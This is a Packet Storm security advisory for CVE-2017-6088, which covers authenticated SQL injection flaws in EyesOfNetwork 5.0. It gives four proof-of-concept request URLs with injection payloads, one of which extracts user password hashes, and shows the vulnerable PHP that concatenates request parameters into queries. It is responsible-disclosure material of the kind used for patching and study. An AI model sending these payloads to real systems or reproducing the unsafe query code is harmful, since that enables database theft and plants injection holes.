EON 5.0 SQL Injection

2017-03-24T00:00:00
ID PACKETSTORM:141810
Type packetstorm
Reporter Nicolas Serra
Modified 2017-03-24T00:00:00

Description

                                        
                                            `# [CVE-2017-6088] EON 5.0 Multiple SQL Injection  
  
## Description  
  
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.  
  
## SQL injection (authenticated)  
  
The Eonweb code does not correctly filter arguments, allowing  
authenticated users to inject arbitrary SQL requests.  
  
**CVE ID**: CVE-2017-6088  
  
**Access Vector**: remote  
  
**Security Risk**: medium  
  
**Vulnerability**: CWE-89  
  
**CVSS Base Score**: 6.0  
  
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L  
  
### Proof of Concept 1 (root privileges)  
  
The following HTTP request allows an attacker (connected as  
administrator) to dump the database contents using SQL injections inside  
either the `bp_name` or the `display` parameter. These requests are  
executed with MySQL root privileges.  
  
```  
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271  
  
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1  
```  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ged_functions.php` file, line 114:  
  
```  
function list_process($bp,$display,$bdd){  
$sql = "select name from bp where is_define = 1 and name!='".$bp."'  
and priority = '" . $display . "'";  
$req = $bdd->query($sql);  
$process = $req->fetchall();  
  
echo json_encode($process);  
}  
```  
  
### Proof of Concept 2  
  
The following HTTP request allows an attacker to dump the database  
contents using SQL injections inside the `type` parameter:  
  
```  
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=  
```  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ajax.php` file, line 64:  
  
```  
if($_GET["type"] == 0){  
$ged_where = "WHERE pkt_type_id!='0'";  
} else {  
$ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";  
}  
$gedsql_result1=sqlrequest($database_ged,"SELECT  
pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");  
```  
  
### Proof of Concept 3  
  
The following HTTP request allows an attacker to dump the database  
contents using SQL injections inside the `search` parameter:  
  
```  
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=  
```  
  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ged_functions.php` file, line 129.  
  
```  
if($search != ""){  
$like = "";  
if( substr($search, 0, 1) === '*' ){  
$like .= "%";  
}  
$like .= trim($search, '*');  
if ( substr($search, -1) === '*' ) {  
$like .= "%";  
}  
  
$where_clause .= " AND $filter LIKE '$like'";  
}  
```  
  
  
### Proof of Concept 4  
  
The following HTTP request allows an attacker to dump the database  
contents using SQL injections inside the `equipment` parameter:  
  
```  
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit  
1)&queue=history  
```  
  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ged_functions.php` file, line 493:  
  
```  
$gedsql_result1=sqlrequest($database_ged,"SELECT  
pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND  
pkt_type_id<'100';");  
  
  
while($ged_type = mysqli_fetch_assoc($gedsql_result1)){  
$sql = "SELECT DISTINCT $filter FROM  
".$ged_type["pkt_type_name"]."_queue_".$queue;  
  
$results = sqlrequest($database_ged, $sql);  
while($result = mysqli_fetch_array($results)){  
if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){  
array_push($datas, $result[$filter]);  
}  
}  
}  
```  
  
  
## Timeline (dd/mm/yyyy)  
  
* 01/10/2016 : Initial discovery.  
* 09/10/2016 : Fisrt contact with vendor.  
* 23/10/2016 : Technical details sent to the security contact.  
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.  
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.  
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our  
repsonsible disclosure agreement.  
* 14/03/2017 : Public disclosure.  
  
Thank you to EON for the fast response.  
  
## Solution  
  
Update to version 5.1.  
  
## Affected versions  
  
* Version <= 5.0  
  
## Credits  
  
* Nicolas SERRA <n.serra@sysdream.com>  
  
--   
SYSDREAM Labs <labs@sysdream.com>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`